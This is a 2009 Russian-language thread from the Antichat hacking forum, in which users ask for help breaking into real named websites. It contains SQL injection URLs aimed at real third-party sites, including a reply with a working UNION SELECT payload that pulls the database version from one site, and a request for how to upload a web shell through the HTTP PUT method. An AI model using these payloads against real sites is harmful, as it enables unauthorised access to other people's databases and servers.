HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5541  
Старый 19.02.2009, 12:32
D1mka
Участник форума
Регистрация: 02.01.2008
Сообщений: 116
С нами: 9660739

Репутация: 58
По умолчанию

когда вверху странички пишет:
/includes/configure.php. Это - потенциальный риск безопасности - пожалуйста, установите необходимые права доступа к этому файлу.

что то можна зделать?
 
Ответить с цитированием

  #5542  
Старый 19.02.2009, 12:43
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами: 10158086

Репутация: 1359


По умолчанию

Цитата:
Сообщение от D1mka  
когда вверху странички пишет:
/includes/configure.php. Это - потенциальный риск безопасности - пожалуйста, установите необходимые права доступа к этому файлу.

что то можна зделать?
установить необходимые права и спать спокойно.
 
Ответить с цитированием

  #5543  
Старый 19.02.2009, 15:26
pingvit
Новичок
Регистрация: 10.03.2008
Сообщений: 27
С нами: 9562916

Репутация: 1
По умолчанию

Можно ли провернуть SQL injection при ошибке следующего вида:

http://beatlesfestival.net.ua/requests.php?action=reset&requestid=sql'

Читал faq'и, везде используют конструкции вида +union+select+кол-во_полей--
А в данном случае, не пойму как это заюзать.
 
Ответить с цитированием

  #5544  
Старый 19.02.2009, 15:32
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами: 9999746

Репутация: 1318


По умолчанию

А с чего ты взял, что оно там есть и что оно не пофиксено?
 
Ответить с цитированием

  #5545  
Старый 19.02.2009, 15:37
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами: 9838057

Репутация: 302
По умолчанию

http://www.sovtest.ru/news.php?id=999999999999%20union%20select%201,2,3, 4,5,6,7,8--
Как быть тут..? Вроде есть вывод. Циферки показывает.. А пишешь Version() и ппц -(
 
Ответить с цитированием

  #5546  
Старый 19.02.2009, 15:41
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
С нами: 10660753

Репутация: 676


По умолчанию

Цитата:
Сообщение от Assembler  
http://www.sovtest.ru/news.php?id=999999999999%20union%20select%201,2,3, 4,5,6,7,8--
Как быть тут..? Вроде есть вывод. Циферки показывает.. А пишешь Version() и ппц -(
http://www.sovtest.ru/news.php?id=99999+union+select+1,unhex(hex(version ())),3,4,5,6,7,8--
 
Ответить с цитированием

  #5547  
Старый 19.02.2009, 15:43
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами: 9838057

Репутация: 302
По умолчанию

aka PSIH, можешь пальцем тыкнуть где там вывод че то я в упор не вижу -(
 
Ответить с цитированием

  #5548  
Старый 19.02.2009, 15:47
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
С нами: 10660753

Репутация: 676


По умолчанию

Цитата:
Сообщение от Assembler  
aka PSIH, можешь пальцем тыкнуть где там вывод че то я в упор не вижу -(
смотри

p.s: пробелы удали =\
 
Ответить с цитированием

  #5549  
Старый 19.02.2009, 18:49
Stradi
Познающий
Регистрация: 09.05.2008
Сообщений: 95
С нами: 9476363

Репутация: 86
По умолчанию

Мм... Дайте почитать что-нибудь о PUT, TRACE и WRITE методах.
Или подскажите... Есть сайт, у него корень со всеми этими параметрами... Как мне загрузить туда шелл, etc.?
Спасибо...
 
Ответить с цитированием

  #5550  
Старый 19.02.2009, 18:53
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Stradi , тоесть нам нужно поискать в гугле и выложить тебе готовые линки? Или как?
Ты считаешь это вопрос по уязвимостям?

ГУГЛ:
RFC 2068
http://lib.misto.kiev.ua/WEBMASTER/rfc2068/rfc2068rus.txt

Если что-то ещё найти, обращайтесь, но сначала лучше попытаться сдесь:
Жмах

Последний раз редактировалось jokester; 19.02.2009 в 19:00..
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.